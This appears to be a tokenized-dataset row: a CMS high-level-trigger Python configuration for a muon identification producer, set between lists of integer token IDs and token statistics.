259,
79,
11,
24519,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
28034,
13,
20471,
13,
3041,
41596,
22784,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
14781,
448,
318,
922,
329,
625,
32232,
262,
279,
318,
262,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
1676,
65,
1799,
286,
34817,
262,
43164,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
28034,
13,
20471,
13,
26932,
448,
7,
79,
28,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
28034,
13,
20471,
13,
14993,
451,
7,
49675,
11,
503,
4008,
198,
198,
2,
4299,
3191,
262,
6436,
7509,
198,
40085,
7509,
796,
28034,
13,
40085,
13,
23159,
7,
19849,
13,
17143,
7307,
22784,
300,
81,
796,
657,
13,
8298,
8,
198,
29113,
7804,
4242,
2235,
198,
2235,
15883,
36835,
82,
1912,
319,
262,
4512,
40213,
2546,
2235,
198,
29113,
7804,
4242,
2235,
198,
198,
23350,
62,
9662,
796,
18896,
7,
27432,
62,
29356,
8,
198,
198,
22510,
62,
538,
5374,
82,
796,
33028,
198,
2,
27432,
2746,
1912,
319,
790,
15458,
1366,
220,
198,
1640,
36835,
287,
2837,
7,
22510,
62,
538,
5374,
82,
1343,
352,
2599,
198,
220,
220,
220,
329,
1312,
11,
357,
40890,
11,
2496,
8,
287,
27056,
378,
7,
27432,
62,
29356,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
5072,
796,
2746,
7,
40890,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2994,
796,
2994,
62,
22184,
7,
22915,
11,
2496,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
6436,
7509,
13,
22570,
62,
9744,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
2994,
13,
1891,
904,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
6436,
7509,
13,
9662,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
611,
36835,
4064,
4751,
6624,
657,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
19203,
13807,
5374,
685,
90,
92,
14,
90,
92,
4357,
5012,
685,
90,
92,
14,
90,
92,
4357,
22014,
25,
46110,
13,
19,
69,
92,
6,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
764,
18982,
7,
538,
5374,
10,
16,
11,
997,
62,
538,
5374,
82,
11,
1312,
10,
16,
11,
2472,
62,
9662,
11,
2994,
13,
9186,
3419,
4008,
198,
198,
2,
49786,
674,
2746,
198,
198,
19849,
13,
18206,
3419,
198,
198,
2,
1136,
477,
11001,
331,
1988,
329,
262,
477,
2124,
1332,
198,
4480,
28034,
13,
3919,
62,
9744,
33529,
198,
220,
220,
220,
331,
62,
28764,
62,
83,
22854,
796,
2746,
7,
87,
62,
9288,
62,
83,
22854,
8,
198,
220,
220,
220,
220,
198,
88,
62,
28764,
796,
331,
62,
28764,
62,
83,
22854,
13,
15255,
620,
22446,
77,
32152,
3419,
198,
198,
2,
15883,
257,
3084,
329,
14176,
1022,
4036,
290,
11001,
198,
5589,
533,
62,
7568,
796,
279,
67,
13,
6601,
19778,
15090,
6,
50039,
10354,
45941,
13,
16485,
1453,
2736,
7,
88,
62,
9288,
13,
27160,
828,
705,
28764,
5722,
10354,
45941,
13,
16485,
1453,
2736,
7,
88,
62,
28764,
8,
30072,
198,
2,
12860,
3478,
4738,
8405,
286,
1366,
5739,
198,
4798,
7,
5589,
533,
62,
7568,
13,
39873,
7,
940,
4008,
198,
198,
4798,
7,
8135,
35720,
13,
4164,
10466,
13,
81,
17,
62,
26675,
7,
88,
62,
9288,
11,
331,
62,
28764,
4008,
198,
198,
7061,
6,
198,
20519,
13165,
354,
3578,
674,
2746,
284,
307,
7448,
13,
383,
10007,
284,
262,
28034,
13,
21928,
3419,
220,
198,
24396,
389,
262,
2746,
284,
307,
7448,
3940,
416,
262,
8619,
3108,
810,
340,
220,
198,
21754,
307,
7448,
198,
7061,
6,
198,
13165,
354,
13,
21928,
7,
19849,
11,
705,
1820,
62,
19849,
11537,
198,
2,
1135,
460,
3440,
257,
7448,
2746,
1262,
262,
28034,
13,
2220,
3419,
2446,
198,
82,
9586,
62,
19849,
796,
28034,
13,
2220,
10786,
1820,
62,
19849,
11537,
628,
198,
7061,
6,
198,
2,
1026,
318,
783,
973,
3446,
703,
356,
973,
262,
2746,
878,
340,
373,
7448,
198,
88,
62,
28764,
62,
83,
22854,
796,
7448,
62,
19849,
7,
87,
62,
9288,
62,
83,
22854,
8,
198,
88,
62,
28764,
796,
331,
62,
28764,
62,
83,
22854,
13,
15255,
620,
22446,
77,
32152,
3419,
198,
7061,
6,
198,
198,
2,
5589,
1723,
262,
11001,
290,
4036,
3815,
351,
7110,
198,
489,
83,
13,
26875,
7,
5647,
7857,
16193,
1065,
11,
807,
4008,
198,
489,
83,
13,
29487,
7,
88,
62,
28764,
11,
6167,
11639,
39156,
5722,
954,
11537,
198,
489,
83,
13,
29487,
7,
88,
62,
9288,
13,
27160,
11,
6167,
11639,
6398,
723,
954,
11537,
198,
489,
83,
13,
1455,
437,
3419,
198,
489,
83,
13,
12860,
3419
] | 2.459812 | 1,916 |
import FWCore.ParameterSet.Config as cms
hltPhase2L3MuonsNoID = cms.EDProducer("MuonIdProducer",
CaloExtractorPSet = cms.PSet(
CenterConeOnCalIntersection = cms.bool(False),
ComponentName = cms.string('CaloExtractorByAssociator'),
DR_Max = cms.double(1.0),
DR_Veto_E = cms.double(0.07),
DR_Veto_H = cms.double(0.1),
DR_Veto_HO = cms.double(0.1),
DepositInstanceLabels = cms.vstring(
'ecal',
'hcal',
'ho'
),
DepositLabel = cms.untracked.string('Cal'),
NoiseTow_EB = cms.double(0.04),
NoiseTow_EE = cms.double(0.15),
Noise_EB = cms.double(0.025),
Noise_EE = cms.double(0.1),
Noise_HB = cms.double(0.2),
Noise_HE = cms.double(0.2),
Noise_HO = cms.double(0.2),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold_E = cms.double(0.2),
Threshold_H = cms.double(0.5),
Threshold_HO = cms.double(0.5),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(1.0),
dREcalPreselection = cms.double(1.0),
dRHcal = cms.double(1.0),
dRHcalPreselection = cms.double(1.0),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
),
UseRecHitsFlag = cms.bool(False)
),
JetExtractorPSet = cms.PSet(
ComponentName = cms.string('JetExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.1),
ExcludeMuonVeto = cms.bool(True),
JetCollectionLabel = cms.InputTag("Notused"),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold = cms.double(5.0),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(0.5),
dREcalPreselection = cms.double(0.5),
dRHcal = cms.double(0.5),
dRHcalPreselection = cms.double(0.5),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
)
),
MuonCaloCompatibility = cms.PSet(
MuonTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_muons_lowPt_3_1_norm.root'),
PionTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_pions_lowPt_3_1_norm.root'),
allSiPMHO = cms.bool(False),
delta_eta = cms.double(0.02),
delta_phi = cms.double(0.02)
),
TimingFillerParameters = cms.PSet(
CSCTimingParameters = cms.PSet(
CSCStripError = cms.double(7.0),
CSCStripTimeOffset = cms.double(0.0),
CSCTimeOffset = cms.double(0.0),
CSCWireError = cms.double(8.6),
CSCWireTimeOffset = cms.double(0.0),
CSCsegments = cms.InputTag("hltCscSegments"),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(100.0),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseStripTime = cms.bool(True),
UseWireTime = cms.bool(True),
debug = cms.bool(False)
),
DTTimingParameters = cms.PSet(
DTTimeOffset = cms.double(2.7),
DTsegments = cms.InputTag("hltDt4DSegments"),
DoWireCorr = cms.bool(False),
DropTheta = cms.bool(True),
HitError = cms.double(6.0),
HitsMin = cms.int32(5),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(10000.0),
RequireBothProjections = cms.bool(False),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseSegmentT0 = cms.bool(False),
debug = cms.bool(False)
),
EcalEnergyCut = cms.double(0.4),
ErrorCSC = cms.double(7.4),
ErrorDT = cms.double(6.0),
ErrorEB = cms.double(2.085),
ErrorEE = cms.double(6.95),
UseCSC = cms.bool(True),
UseDT = cms.bool(True),
UseECAL = cms.bool(True)
),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
GEMSegmentCollectionLabel = cms.InputTag("hltGemSegments"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
ME0SegmentCollectionLabel = cms.InputTag("hltMe0Segments"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(9999.0),
dREcalPreselection = cms.double(0.05),
dRHcal = cms.double(9999.0),
dRHcalPreselection = cms.double(0.2),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(False),
useEcal = cms.bool(False),
useGEM = cms.bool(True),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useME0 = cms.bool(False),
# useME0 = cms.bool(True), ### Thiago: in the offline RECO it is false...
useMuon = cms.bool(True),
usePreshower = cms.bool(False)
),
TrackExtractorPSet = cms.PSet(
BeamSpotLabel = cms.InputTag("offlineBeamSpot"),
BeamlineOption = cms.string('BeamSpotFromEvent'),
Chi2Ndof_Max = cms.double(1e+64),
Chi2Prob_Min = cms.double(-1.0),
ComponentName = cms.string('TrackExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.01),
Diff_r = cms.double(0.1),
Diff_z = cms.double(0.2),
NHits_Min = cms.uint32(0),
Pt_Min = cms.double(-1.0),
inputTrackCollection = cms.InputTag("hltPhase2L3MuonMerged")
),
TrackerKinkFinderParameters = cms.PSet(
diagonalOnly = cms.bool(False),
usePosition = cms.bool(False)
),
addExtraSoftMuons = cms.bool(False),
arbitrateTrackerMuons = cms.bool(True),
arbitrationCleanerOptions = cms.PSet(
ClusterDPhi = cms.double(0.6),
ClusterDTheta = cms.double(0.02),
Clustering = cms.bool(True),
ME1a = cms.bool(True),
Overlap = cms.bool(True),
OverlapDPhi = cms.double(0.0786),
OverlapDTheta = cms.double(0.02)
),
debugWithTruthMatching = cms.bool(False),
ecalDepositName = cms.string('ecal'),
fillCaloCompatibility = cms.bool(False),
fillEnergy = cms.bool(False),
fillGlobalTrackQuality = cms.bool(False),
fillGlobalTrackRefits = cms.bool(False),
fillIsolation = cms.bool(False),
fillMatching = cms.bool(True),
fillTrackerKink = cms.bool(False),
globalTrackQualityInputTag = cms.InputTag(""),
hcalDepositName = cms.string('hcal'),
hoDepositName = cms.string('ho'),
inputCollectionLabels = cms.VInputTag("hltPhase2L3MuonMerged", "hltPhase2L3GlbMuon", "hltL2MuonsFromL1TkMuon:UpdatedAtVtx"),
inputCollectionTypes = cms.vstring(
'inner tracks',
'links',
'outer tracks'
),
jetDepositName = cms.string('jets'),
maxAbsDx = cms.double(3.0),
maxAbsDy = cms.double(9999.0),
maxAbsEta = cms.double(3.0),
maxAbsPullX = cms.double(4.0),
maxAbsPullY = cms.double(9999.0),
minCaloCompatibility = cms.double(0.6),
minNumberOfMatches = cms.int32(1),
minP = cms.double(0.0),
minPCaloMuon = cms.double(1000000000.0),
minPt = cms.double(2.0),
ptThresholdToFillCandidateP4WithGlobalFit = cms.double(200.0),
runArbitrationCleaner = cms.bool(False),
sigmaThresholdToFillCandidateP4WithGlobalFit = cms.double(2.0),
trackDepositName = cms.string('tracker'),
writeIsoDeposits = cms.bool(False)
)
| [
11748,
48849,
14055,
13,
36301,
7248,
13,
16934,
355,
269,
907,
198,
198,
71,
2528,
35645,
17,
43,
18,
33239,
684,
2949,
2389,
796,
269,
907,
13,
1961,
11547,
2189,
7203,
33239,
261,
7390,
11547,
2189,
1600,
198,
220,
220,
220,
2199,
78,
11627,
40450,
3705,
316,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
3337,
34,
505,
2202,
9771,
9492,
5458,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
35100,
5376,
796,
269,
907,
13,
8841,
10786,
34,
7335,
11627,
40450,
3886,
8021,
1733,
1352,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
10560,
62,
11518,
796,
269,
907,
13,
23352,
7,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
10560,
62,
53,
27206,
62,
36,
796,
269,
907,
13,
23352,
7,
15,
13,
2998,
828,
198,
220,
220,
220,
220,
220,
220,
220,
10560,
62,
53,
27206,
62,
39,
796,
269,
907,
13,
23352,
7,
15,
13,
16,
828,
198,
220,
220,
220,
220,
220,
220,
220,
10560,
62,
53,
27206,
62,
32298,
796,
269,
907,
13,
23352,
7,
15,
13,
16,
828,
198,
220,
220,
220,
220,
220,
220,
220,
44158,
33384,
17822,
1424,
796,
269,
907,
13,
85,
8841,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
721,
282,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
71,
9948,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
8873,
6,
198,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
44158,
33986,
796,
269,
907,
13,
403,
2213,
6021,
13,
8841,
10786,
9771,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
30964,
51,
322,
62,
30195,
796,
269,
907,
13,
23352,
7,
15,
13,
3023,
828,
198,
220,
220,
220,
220,
220,
220,
220,
30964,
51,
322,
62,
6500,
796,
269,
907,
13,
23352,
7,
15,
13,
1314,
828,
198,
220,
220,
220,
220,
220,
220,
220,
30964,
62,
30195,
796,
269,
907,
13,
23352,
7,
15,
13,
36629,
828,
198,
220,
220,
220,
220,
220,
220,
220,
30964,
62,
6500,
796,
269,
907,
13,
23352,
7,
15,
13,
16,
828,
198,
220,
220,
220,
220,
220,
220,
220,
30964,
62,
32886,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
30964,
62,
13909,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
30964,
62,
32298,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
12578,
7575,
19100,
796,
269,
907,
13,
403,
2213,
6021,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
8772,
363,
1352,
5376,
796,
269,
907,
13,
8841,
10786,
71,
2528,
1546,
47,
22968,
7447,
2105,
12621,
844,
24331,
363,
1352,
7149,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
4809,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8772,
363,
2024,
796,
269,
907,
13,
403,
2213,
6021,
13,
85,
8841,
10786,
71,
2528,
1546,
47,
22968,
7447,
2105,
12621,
844,
24331,
363,
1352,
7149,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25812,
5097,
6962,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5765,
33239,
261,
30575,
7065,
796,
269,
907,
13,
403,
2213,
6021,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
536,
10126,
62,
36,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
536,
10126,
62,
39,
796,
269,
907,
13,
23352,
7,
15,
13,
20,
828,
198,
220,
220,
220,
220,
220,
220,
220,
536,
10126,
62,
32298,
796,
269,
907,
13,
23352,
7,
15,
13,
20,
828,
198,
220,
220,
220,
220,
220,
220,
220,
17762,
8021,
1733,
1352,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
41030,
434,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
34,
1416,
41030,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2199,
78,
51,
789,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
360,
5446,
721,
41030,
434,
19,
35,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
35,
83,
19,
5258,
1533,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
43374,
6690,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
412,
1137,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25997,
16879,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
48345,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1848,
1890,
15721,
752,
652,
19400,
34,
7335,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
2200,
9948,
796,
269,
907,
13,
23352,
7,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
2200,
9948,
6719,
49283,
796,
269,
907,
13,
23352,
7,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
48587,
9948,
796,
269,
907,
13,
23352,
7,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
48587,
9948,
6719,
49283,
796,
269,
907,
13,
23352,
7,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
29138,
84,
261,
796,
269,
907,
13,
23352,
7,
24214,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
29138,
84,
261,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
20031,
3447,
789,
6719,
49283,
796,
269,
907,
13,
23352,
7,
15,
13,
17,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
50,
13495,
55,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
50,
13495,
56,
796,
269,
907,
13,
23352,
7,
15,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
55,
796,
269,
907,
13,
23352,
7,
20,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
38779,
261,
11518,
45767,
56,
796,
269,
907,
13,
23352,
7,
20,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
47933,
3237,
13470,
507,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22942,
3118,
39239,
774,
51,
37668,
796,
269,
907,
13,
23352,
32590,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3872,
23850,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
34,
7335,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
36,
9948,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
32298,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
39,
9948,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
33239,
261,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
779,
47,
3447,
789,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
5765,
6690,
39,
896,
34227,
796,
269,
907,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
19013,
11627,
40450,
3705,
316,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
35100,
5376,
796,
269,
907,
13,
8841,
10786,
42273,
11627,
40450,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
10560,
62,
11518,
796,
269,
907,
13,
23352,
7,
16,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
10560,
62,
53,
27206,
796,
269,
907,
13,
23352,
7,
15,
13,
16,
828,
198,
220,
220,
220,
220,
220,
220,
220,
1475,
9152,
33239,
261,
53,
27206,
796,
269,
907,
13,
30388,
7,
17821,
828,
198,
220,
220,
220,
220,
220,
220,
220,
19013,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
12578,
7575,
19100,
796,
269,
907,
13,
403,
2213,
6021,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
8772,
363,
1352,
5376,
796,
269,
907,
13,
8841,
10786,
71,
2528,
1546,
47,
22968,
7447,
2105,
12621,
844,
24331,
363,
1352,
7149,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
4809,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8772,
363,
2024,
796,
269,
907,
13,
403,
2213,
6021,
13,
85,
8841,
10786,
71,
2528,
1546,
47,
22968,
7447,
2105,
12621,
844,
24331,
363,
1352,
7149,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25812,
5097,
6962,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5765,
33239,
261,
30575,
7065,
796,
269,
907,
13,
403,
2213,
6021,
13,
30388,
7,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
220,
220,
220,
220,
536,
10126,
796,
269,
907,
13,
23352,
7,
20,
13,
15,
828,
198,
220,
220,
220,
220,
220,
220,
220,
17762,
8021,
1733,
1352,
48944,
796,
269,
907,
13,
3705,
316,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6173,
41030,
434,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
34,
1416,
41030,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2199,
78,
51,
789,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
360,
5446,
721,
41030,
434,
19,
35,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
71,
2528,
35,
83,
19,
5258,
1533,
902,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
43374,
6690,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
412,
1137,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25997,
16879,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
48345,
721,
17889,
36307,
33986,
796,
269,
907,
13,
20560,
24835,
7203,
3673,
1484,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1848,
1890,
15721,
752,
652,
19400,
34,
7335,
796,
269,
907,
13,
30388,
7,
25101,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
